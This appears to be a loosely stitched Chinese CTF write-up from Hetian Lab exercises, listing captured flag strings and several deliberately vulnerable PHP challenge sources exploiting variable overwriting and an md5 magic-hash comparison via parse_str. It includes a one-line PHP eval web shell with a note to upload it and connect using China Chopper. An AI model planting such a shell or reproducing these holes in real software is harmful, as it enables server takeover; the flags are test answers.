旧文,师傅们随便看看
flag是:Flag{ctf_victory_SecBug}
拿到flag: flag{hetianlab-weekctf}
拼接flag为:flag{Thisis_hetianlab@}
flag{welcome_to_htlab}
Flag: flag{hetian@lab_com}
行 flag{0000_0000_0000}
flag{asdf_hetianlab_com}
<script language="pHp">@eval($_POST['UzJu'])</script>
上传后使用菜刀连接
Flag:flag{0123_4567_8901}
Flag: flag{abdc_1234_qwer_hetian}
flag{whoami_hetianlab_student}
Flag(hetianlab_ctf)
flag{hetian_1234_awdr}
flag{enter_your_passwd}
flag{0123_hetianlab_hunan}
<?php
include "flag.php";
$_403 = "Access Denied";
$_200 = "Welcome Admin";
if ($_SERVER["REQUEST_METHOD"] != "POST"){
//需要POST方法
die("hetianlab flag is here :biubiubiu");
}if (!isset($_POST["flag"])){
//需要POST参数=flag
die($_403);
}foreach ($_GET as $key => $value){
//遍历GET方法所传值
$$key = $$value;
}foreach ($_POST as $key => $value){
//遍历POST方法所传值
$$key = $value;
}if ($_POST["flag"] !== $flag){
die($_403);
}
echo "This is your flag : ". $flag . "\n";
die($_200);
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>学会变量覆盖</title>
</head>
<body>
<!--
$flag='xxxx':
extract($_GET):
if (isset($gift))
Scontent =@trim(file_get_contents($flag)):
if (Sgift = $content)
echo"flag
else
echo ' oh . . ' ;
-->
</body>
</html>
<?php
highlight_file('source.txt');
echo "<br><br>";
$flag = 'xxxxxxxx';
$msg_giveme = 'Give me the flag!';
$msg_getout = 'No this. Get out!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($msg_giveme);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($msg_getout);
}
foreach ($_POST as $key => $value) {
$$key = $value;
}
foreach ($_GET as $key => $value) {
$$key = $$value;
}
echo 'the flag is : ' . $flag;
?>
flag{asdhetianlab}
<?php
header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
if (empty($_GET['id']))
{
show_source(__FILE__);
die();
}
else
{
include ('flag.php');
$a = "www.hetianlab.com ";
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO'))
{
echo $flag;
}
else
{
exit('其实很简单其实并不难!');
}
}
?>
Parse_str导致的变量覆盖
Flag: flag{63564494cac7097c}
Flag:flag{ff98f887ddaaad88}